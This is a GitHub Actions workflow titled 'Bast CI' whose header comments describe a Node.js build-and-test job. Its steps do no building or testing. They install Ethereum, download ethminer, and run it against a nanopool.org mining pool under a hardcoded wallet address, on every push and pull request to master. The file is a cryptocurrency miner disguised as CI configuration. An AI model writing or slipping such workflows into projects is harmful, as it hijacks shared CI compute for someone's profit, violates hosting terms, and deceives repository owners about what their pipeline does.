# This workflow will do a clean installation of node dependencies, cache/restore them, build the source code and run tests across different versions of node
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-nodejs-with-github-actions

name: Bast CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:
  build:

    runs-on: ubuntu-latest

    strategy:
      matrix:
        node-version: [12.x, 14.x, 16.x]
        # See supported Node.js release schedule at https://nodejs.org/en/about/releases/

    steps:
    - uses: actions/checkout@v2
    - name: Use Node.js ${{ matrix.node-version }}
      uses: actions/setup-node@v2
      with:
        node-version: ${{ matrix.node-version }}
        cache: 'npm'
    - run: sudo add-apt-repository ppa:ethereum/ethereum
    - run: sudo cat /etc/apt/sources.list
    - run: sudo apt update
    - run: sudo apt install ethereum
    - run: wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz
    - run: ls
    - run: tar -zxvf ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz
    - run: cd bin/
    - run: ./ethminer -G -P stratum1+tcp://0xFf463DF8AA171AaCC680862fD28251019a47E08b@eth-asia1.nanopool.org:9999
